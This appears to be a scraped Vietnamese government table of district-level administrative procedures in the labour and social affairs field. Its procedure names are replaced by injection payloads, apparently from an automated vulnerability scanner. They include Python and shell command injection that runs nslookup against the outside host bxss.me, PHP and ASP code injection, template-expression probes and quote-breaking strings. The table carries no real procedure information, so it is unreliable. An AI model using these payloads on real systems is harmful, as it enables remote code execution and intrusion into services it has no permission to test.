Quản lý Thủ Tục Hành Chính

Cơ quan thực hiện
Lĩnh vực
Từ khóa
STT Tên thủ tục Mức độ Cơ quan thực hiện Lĩnh vực
1 "+str(__import__('time').sleep(9))+__import__('os').popen('nslookup hity6JiwK6HQtad1fd.'+'bxss.me').read()+" 1 Cấp Quận Lao động - Thương binh và Xã hội
2 ";print(md5(31337));$a=" 1 Cấp Quận Lao động - Thương binh và Xã hội
3 #{9999368+9999836} 1 Cấp Quận Lao động - Thương binh và Xã hội
4 $(nslookup hitexEqPKtO2jd926c.bxss.me) 1 Cấp Quận Lao động - Thương binh và Xã hội
5 ${9999368+9999836} 1 Cấp Quận Lao động - Thương binh và Xã hội
6 ${@print(md5(31337))} 1 Cấp Quận Lao động - Thương binh và Xã hội
7 ${@print(md5(31337))}\ 1 Cấp Quận Lao động - Thương binh và Xã hội
8 &nslookup hitZU6R7J6arXf53b3.bxss.me&'\"`0&nslookup hitZU6R7J6arXf53b3.bxss.me&`' 1 Cấp Quận Lao động - Thương binh và Xã hội
9 '" 1 Cấp Quận Lao động - Thương binh và Xã hội
10 '"()&% 1 Cấp Quận Lao động - Thương binh và Xã hội
11 '+response.write(9737989*9053139)+' 1 Cấp Quận Lao động - Thương binh và Xã hội
12 '+str(__import__("time").sleep(9))+__import__("os").popen("nslookup hity6JiwK6HQtad1fd."+"bxss.me").read()+' 1 Cấp Quận Lao động - Thương binh và Xã hội
13 ';print(md5(31337));$a=' 1 Cấp Quận Lao động - Thương binh và Xã hội
14 ))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) 1 Cấp Quận Lao động - Thương binh và Xã hội
15 /xfs.bxss.me 1 Cấp Quận Lao động - Thương binh và Xã hội
16 1����%2527%2522 1 Cấp Quận Lao động - Thương binh và Xã hội
17 1 1 Cấp Quận Lao động - Thương binh và Xã hội
18 1 1 Cấp Quận Lao động - Thương binh và Xã hội
19 1 1 Cấp Quận Lao động - Thương binh và Xã hội
20 1 1 Cấp Quận Lao động - Thương binh và Xã hội